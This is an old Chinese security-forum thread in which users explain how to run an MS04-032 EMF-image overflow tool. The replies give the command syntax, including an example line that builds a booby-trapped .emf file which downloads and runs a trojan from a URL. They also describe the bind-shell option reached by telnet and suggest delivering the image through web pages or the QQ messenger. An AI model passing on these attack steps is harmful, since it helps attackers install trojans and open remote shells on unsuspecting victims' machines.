|
 | 作者: longway_cn [longway_cn]
 论坛用户 |
登录 |
| 最近在很多网站看到ms04-032漏洞利用的溢出工具,虽然名字不大相同,但实际上好像都是一种工具。看了很久,却始终不明白究竟该如何使用。小弟有以下几点疑惑,恳请各位帮忙解决以下。 1、该工具是在本机的执行还是在远程主机的shell下执行?它的格式是: ms04-032.exe <file> <shellcode> <bindport / url> Shellcode: 1 - Portbind shellcode---------绑定一个shell 2 - Download & exec shellcode--------下载一个指定EXE并运行 上面没有提及远程ip,因此我想不出怎么对远程主机溢出攻击。 2、该工具所提到的<file>是指一个.emf文件,这个文件是每个机器上都有的还是必须上传到目标主机上的啊?那么我怎么知道哪个主机上有此文件呢? …… 反正就是头大,实在不明白这个工具该如何使用…… 请哪位好心的大哥指点一下,本人愚钝,希望能很详细讲述该如何利用。 不胜感激!!! |
| 地主 发表时间: 00-01-01 02:57 |
 | 回复: baobao [gnijnil]  论坛用户 |
登录 |
|
http://www.77169.com/Article/Class65/donghua/200410/12541.html 看看这个吧,我看了还是一头雾水  |
| B1层 发表时间: 00-01-01 03:28 |
| 回复: longway_cn [longway_cn] 论坛用户 |
登录 |
|
那有没有人成功利用过此工具啊? 有的话希望能赐教! |
| B2层 发表时间: 04-11-04 08:31 |
 | 回复: amr [amr]  论坛用户 |
登录 |
|
file 是我们要生成的图片名字和格式 格式是.emf后缀的。。。 1 是溢出的对方主机端口 成功后用telnet ip bindport 进去 2 url 是别人打开图片后到指定路径下载木马。。 如 ms04032 amr.emf 2 http://***.***.com/amr.exe 能否成功还未知,,呵呵 制作网页木马。。或者在QQ上发送。。。呵呵,QQ上能成功的 [此贴被 amr(amr) 在 11月04日14时04分 编辑过] |
| B3层 发表时间: 04-11-04 14:03 |
 | 回复: j3pt [j3pt] 论坛用户 |
登录 |
|
就是他那个格式 可以成功 |
| B4层 发表时间: 04-11-04 14:21 |
| 回复: amr [amr] 论坛用户 |
登录 |
|
可以下载木马 |
| B5层 发表时间: 04-11-04 15:07 |
| 回复: amr [amr] 论坛用户 |
登录 |
|
装了ACDSEE后就能打开这个图片,不知网上有没有emf2jpg这样的工具啊 |
| B6层 发表时间: 04-11-05 18:29 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于ms04-032溢出工具使用的问题!